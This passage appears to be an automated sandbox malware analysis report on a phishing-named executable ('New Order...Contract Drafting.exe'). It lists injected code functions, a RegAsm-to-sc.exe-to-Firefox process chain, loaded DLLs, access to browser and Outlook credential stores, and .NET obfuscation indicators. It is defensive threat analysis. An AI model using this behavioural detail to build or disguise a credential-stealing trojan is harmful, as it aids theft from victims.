Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039F4750 6_2_039F4750
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D0770 6_2_039D0770
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039EC6E0 6_2_039EC6E0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A90591 6_2_03A90591
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D0535 6_2_039D0535
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A7E4F6 6_2_03A7E4F6
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A74420 6_2_03A74420
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A82446 6_2_03A82446
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A86BD7 6_2_03A86BD7
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8AB40 6_2_03A8AB40
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039CEA80 6_2_039CEA80
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A9A9A6 6_2_03A9A9A6
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D29A0 6_2_039D29A0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039E6962 6_2_039E6962
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039B68B8 6_2_039B68B8
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039FE8F0 6_2_039FE8F0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039DA840 6_2_039DA840
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D2840 6_2_039D2840
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A4EFA0 6_2_03A4EFA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039C2FC8 6_2_039C2FC8
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A12F28 6_2_03A12F28
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A72F30 6_2_03A72F30
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039F0F30 6_2_039F0F30
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A44F40 6_2_03A44F40
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039E2E90 6_2_039E2E90
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8CE93 6_2_03A8CE93
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8EEDB 6_2_03A8EEDB
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8EE26 6_2_03A8EE26
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D0E59 6_2_039D0E59
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039E8DBF 6_2_039E8DBF
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039CADE0 6_2_039CADE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039DAD00 6_2_039DAD00
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A6CD1F 6_2_03A6CD1F
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A70CB5 6_2_03A70CB5
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039C0CF2 6_2_039C0CF2
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D0C00 6_2_039D0C00
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A1739A 6_2_03A1739A
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8132D 6_2_03A8132D
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039BD34C 6_2_039BD34C
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D52A0 6_2_039D52A0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A712ED 6_2_03A712ED
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039EB2C0 6_2_039EB2C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039ED2F0 6_2_039ED2F0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039DB1B0 6_2_039DB1B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A9B16B 6_2_03A9B16B
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A0516C 6_2_03A0516C
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039BF172 6_2_039BF172
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A870E9 6_2_03A870E9
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8F0E0 6_2_03A8F0E0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D70C0 6_2_039D70C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A7F0CC 6_2_03A7F0CC
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8F7B0 6_2_03A8F7B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A816CC 6_2_03A816CC
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A15630 6_2_03A15630
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A6D5B0 6_2_03A6D5B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A995C3 6_2_03A995C3
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A87571 6_2_03A87571
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8F43F 6_2_03A8F43F
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039C1460 6_2_039C1460
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039EFB80 6_2_039EFB80
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A45BF0 6_2_03A45BF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A0DBF9 6_2_03A0DBF9
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8FB76 6_2_03A8FB76
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A15AA0 6_2_03A15AA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A71AA3 6_2_03A71AA3
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A6DAAC 6_2_03A6DAAC
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A7DAC6 6_2_03A7DAC6
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A43A6C 6_2_03A43A6C
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8FA49 6_2_03A8FA49
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A87A46 6_2_03A87A46
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A65910 6_2_03A65910
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D9950 6_2_039D9950
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039EB950 6_2_039EB950
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D38E0 6_2_039D38E0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A3D800 6_2_03A3D800
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D1F92 6_2_039D1F92
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8FFB1 6_2_03A8FFB1
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03993FD2 6_2_03993FD2
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03993FD5 6_2_03993FD5
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8FF09 6_2_03A8FF09
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D9EB0 6_2_039D9EB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039EFDC0 6_2_039EFDC0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A87D73 6_2_03A87D73
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039D3D40 6_2_039D3D40
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A81D5A 6_2_03A81D5A
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A8FCF2 6_2_03A8FCF2
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_03A49C32 6_2_03A49C32
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F22110 6_2_02F22110
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F1CFC0 6_2_02F1CFC0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F1B320 6_2_02F1B320
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F1B314 6_2_02F1B314
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F1B31C 6_2_02F1B31C
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F1D1E0 6_2_02F1D1E0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F1B1D0 6_2_02F1B1D0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F257D0 6_2_02F257D0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F239D0 6_2_02F239D0
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F3BF80 6_2_02F3BF80
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_0372E563 6_2_0372E563
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_0372E448 6_2_0372E448
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_037354D4 6_2_037354D4
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_0372D9C8 6_2_0372D9C8
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_0372E8FD 6_2_0372E8FD
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_0372CC73 6_2_0372CC73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02895130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 028CEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 028DF290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 028A7E54 appears 107 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0284B970 appears 262 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 03A17E54 appears 107 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 03A3EA12 appears 86 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 039BB970 appears 262 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 03A4F290 appears 103 times
Source: C:\Windows\SysWOW64\sc.exe Code function: String function: 03A05130 appears 58 times
Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721869696.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRIDE.dll* vs New Order - RCII900718_Contract Drafting.exe
Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1720676508.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs New Order - RCII900718_Contract Drafting.exe
Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721792816.0000000000FE0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRIDE.dll* vs New Order - RCII900718_Contract Drafting.exe
Source: New Order - RCII900718_Contract Drafting.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: New Order - RCII900718_Contract Drafting.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: New Order - RCII900718_Contract Drafting.exe, c4f54486cecec56b3df70dc7d0b0173ae.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: New Order - RCII900718_Contract Drafting.exe, c68b42d019343789ff263031dfcd77c80.cs Base64 encoded string: 'TmV3IE9yZGVyIC0gUkNJSTkwMDcxOF9Db250cmFjdCBEcmFmdGluZyQ='
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@5/4
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order - RCII900718_Contract Drafting.exe.log Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\sc.exe File created: C:\Users\user\AppData\Local\Temp\04j58b6g Jump to behavior
Source: New Order - RCII900718_Contract Drafting.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: New Order - RCII900718_Contract Drafting.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: sc.exe, 00000006.00000003.2421499932.00000000032E9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2421347533.00000000032C8000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2977665984.00000000032E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: New Order - RCII900718_Contract Drafting.exe ReversingLabs: Detection: 31%
Source: New Order - RCII900718_Contract Drafting.exe Virustotal: Detection: 33%
Source: unknown Process created: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe "C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe"
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: New Order - RCII900718_Contract Drafting.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: New Order - RCII900718_Contract Drafting.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RIDE.pdb source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721869696.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721792816.0000000000FE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167494215.000000000054E000.00000002.00000001.01000000.00000007.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2977812837.000000000054E000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: sc.pdbUGP source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: sc.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: New Order - RCII900718_Contract Drafting.exe, cf2a4bb06922f42bd89f0b891d1b61c46.cs .Net Code: cb48b1adfa9c2725169d7374c67d3f787 System.Reflection.Assembly.Load(byte[])
Source: New Order - RCII900718_Contract Drafting.exe, c8f1bb4de9963b88d3763aa7fcf12cf79.cs .Net Code: c0bc33011b8adf1b13e4a064148b8dee1 System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0040184C push E711456Eh; retf 1_2_00401809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00416063 push esi; retf 1_2_0041606E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004021E1 push ss; retf 1_2_004021E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00414992 push ebp; iretd 1_2_004149B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00417A42 push ss; iretd 1_2_00417A4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004073CC push ds; iretd 1_2_00407424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004073D3 push ds; iretd 1_2_00407424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004163A6 push 0000005Ch; iretd 1_2_004163B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00403440 push eax; ret 1_2_00403442
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00418451 pushad ; iretd 1_2_00418474
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00411E78 push esp; ret 1_2_00411E79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00408601 push ds; retf 1_2_00408602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0040AE01 push cs; ret 1_2_0040AE02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0040A763 push 689E092Ah; ret 1_2_0040A775
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0282225F pushad ; ret 1_2_028227F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028227FA pushad ; ret 1_2_028227F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0282283D push eax; iretd 1_2_02822858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028509AD push ecx; mov dword ptr [esp], ecx 1_2_028509B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02821368 push eax; iretd 1_2_02821369
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028CBA04 push esi; retf 5_2_028CBA0F
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028CD3E3 push ss; iretd 5_2_028CD3ED
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028C7819 push esp; ret 5_2_028C781A
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028BDFA2 push ds; retf 5_2_028BDFA3
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028C07A2 push cs; ret 5_2_028C07A3
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028CEFE0 push cs; iretd 5_2_028CEFF5
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028CBD47 push 0000005Ch; iretd 5_2_028CBD53
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028BCD6D push ds; iretd 5_2_028BCDC5
